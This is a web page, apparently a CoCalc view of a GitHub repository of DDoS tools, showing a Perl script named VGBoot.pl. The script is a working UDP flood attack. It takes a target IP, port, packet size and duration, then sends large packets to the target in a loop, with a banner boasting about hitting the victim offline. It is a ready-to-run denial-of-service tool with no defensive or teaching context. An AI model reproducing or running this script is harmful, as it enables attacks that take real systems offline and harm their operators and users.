Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/DDOS Scripts/L4/UDP/VGBoot.pl
4607 views
1
#!/usr/bin/perl
2
3
use Term::ANSIColor qw(:constants);
4
$Term::ANSIColor::AUTORESET = 2;
5
6
print BOLD RED "IP first";
7
print BOLD YELLOW "port Second\n";
8
print BOLD GREEN "packets third";
9
print BOLD BLACK "seconds last\n";
10
11
############
12
# Monarch<----
13
############
14
15
use Socket;
16
use strict;
17
18
my ($ip,$port,$size,$time) = @ARGV;
19
20
my ($iaddr,$endtime,$psize,$pport);
21
22
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
23
$endtime = time() + ($time ? $time : 100);
24
socket(flood, PF_INET, SOCK_DGRAM, 17);
25
26
print BOLD GREEN<<EOTEXT;
27
||' '|' '||''|. '||''|. IP: $ip
28
|| | || || || || PORT: $port
29
|| | || || ||...|' PACKETS: $size
30
|| | || || || TIME: $time
31
'|..' .||...|' .||.
32
DDoS GoD By Vinix G YoU JuSt HiT $ip with $size packets.
33
-VGBoot DDoS script.
34
By: xxjasontpikexx AKA DEEP-WEB (GHOST HACKER)
35
36
EOTEXT
37
38
use Term::ANSIColor qw(:constants);
39
$Term::ANSIColor::AUTORESET = 2;
40
print "~ FuCk YoU~ $ip " . ($port ? $port : "random") . "-" .
41
($size ? "$size-byte" : "Get Null Routed Bitch!?") . "
42
~ DDoSing $ip.
43
~ #OffLine ~ " .
44
($time ? " for $time seconds" : "") . "\n";
45
print "Break with Ctrl-C\n" unless $time;
46
47
for (;time() <= $endtime;) {
48
$psize = $size ? $size : int(rand(1500000-64)+64) ;
49
$pport = $port ? $port : int(rand(1500000))+1;
50
51
send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
52
$iaddr));}
53
54